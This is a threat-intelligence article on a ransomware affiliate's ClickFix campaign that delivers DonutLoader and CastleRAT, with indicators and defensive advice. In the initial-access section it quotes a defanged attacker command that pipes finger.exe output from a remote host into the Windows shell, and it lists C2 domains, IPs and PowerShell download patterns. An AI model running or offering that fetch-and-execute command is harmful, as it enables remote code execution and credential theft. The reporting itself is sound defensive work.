Velvet Tempest Deploys CastleRAT via ClickFix Attacks

Threat researchers at MalBeacon observed ransomware affiliate Velvet Tempest conducting a 12-day intrusion using ClickFix social engineering to deploy DonutLoader and CastleRAT malware. The operation, which ran from February 3-16 in a U.S. nonprofit environment, shares infrastructure with Termite ransomware staging systems.

Velvet Tempest (also tracked as DEV-0504) has operated as a ransomware affiliate for at least five years, deploying strains including Ryuk, REvil, Conti, BlackMatter, BlackCat/ALPHV, LockBit, and RansomHub. The group's adoption of ClickFix marks the first public reporting tying these specific attack chains to Velvet Tempest operations.

The Attack Unfolds

The intrusion began when a victim encountered a malicious advertisement displaying a fake "verify you are human" prompt. Unlike traditional malware delivery through email attachments or macros, ClickFix tricks users into copying a command and pasting it into the Windows Run dialog themselves.

The pasted command initiated a chain of nested cmd.exe processes and abused the legitimate Windows utility finger.exe to fetch initial payloads. From there, the attack progressed through distinct phases:

Stage 1-2: Initial Access The ClickFix command executed: finger clo@finger[.]h3securecloud[.]com | %COMSPEC%

This retrieved and executed additional PowerShell payloads using Invoke-Expression (IEX) downloads from attacker infrastructure including vrstudio[.]life and gamestudio[.]life.

Stage 3: DonutLoader Deployment DonutLoader staging established persistent command-and-control communications. The loader compiled .NET components dynamically using csc.exe from user temporary directories—a technique designed to evade static detection.

Stage 4: CastleRAT and Reconnaissance CastleRAT callbacks connected to nachalonachalo[.]com and akamedmain[.]com. The operator then executed hands-on-keyboard activity: Active Directory enumeration via nltest and net commands, domain trust discovery, and drive mapping reconnaissance.

Three days into the intrusion, attackers attempted Chrome credential extraction using a script hosted at 143.198.160[.]37—an IP address associated with Termite ransomware infrastructure.

Technical Indicators

Security teams should hunt for these behaviors:

PowerShell Patterns:

• -WindowStyle Hidden combined with -EncodedCommand flags
• IEX (Invoke-Expression) with DownloadData against .life TLDs

File System Activity:

• .NET compilation via csc.exe from %TEMP% directories
• Python components under C:\ProgramData\AndronFolder

Network Indicators:

• Domains: h3securecloud[.]com, grtrip[.]org, vrstudio[.]life, gamestudio[.]life
• C2 IPs: 143.198.160[.]37, 134.209.125[.]225, 24.199.81[.]95, 170.130.55[.]86

ClickFix Evolution

ClickFix has emerged as a dominant social engineering technique in 2026, displacing older methods like SocGholish. We've tracked multiple campaigns abusing this approach, including ClickFix attacks using fake CAPTCHA lures to deploy Amatera Stealer and the EVALUSION campaign targeting enterprise environments.

The technique works because it bypasses security controls that focus on attachments, macros, and downloaded executables. When users manually paste commands into the Run dialog, they're effectively authorizing the execution themselves—circumventing application whitelisting and behavioral analysis at the point of initial compromise.

Why This Matters

No encryption occurred during the monitored 12-day window, but the infrastructure links to Termite ransomware suggest pre-positioning for later extortion. This aligns with modern ransomware operations that prioritize reconnaissance and credential harvesting before pulling the trigger on encryption.

The dwell time also enables broader access. Velvet Tempest's AD enumeration indicates interest in understanding the full environment—identifying domain trusts, privileged accounts, and lateral movement opportunities that would maximize a future ransomware deployment's impact.

Organizations in the nonprofit sector, which historically lack dedicated security resources, represent attractive targets. The BridgePay ransomware incident demonstrated how ransomware operators increasingly target organizations supporting critical functions rather than the highest-profile names.

Defensive Recommendations

1. Educate users about ClickFix lures—legitimate CAPTCHA services never ask users to paste commands
2. Restrict PowerShell to signed scripts or constrained language mode where feasible
3. Monitor for csc.exe compilation outside development contexts
4. Block known C2 domains at the network perimeter
5. Alert on finger.exe usage, which has minimal legitimate purpose in most environments

The 12-day persistence before detection in this case underscores the importance of continuous monitoring. Behavioral detection focused on the execution chain—cmd.exe spawning PowerShell with encoded commands connecting to .life domains—provides defense-in-depth against this evolving threat.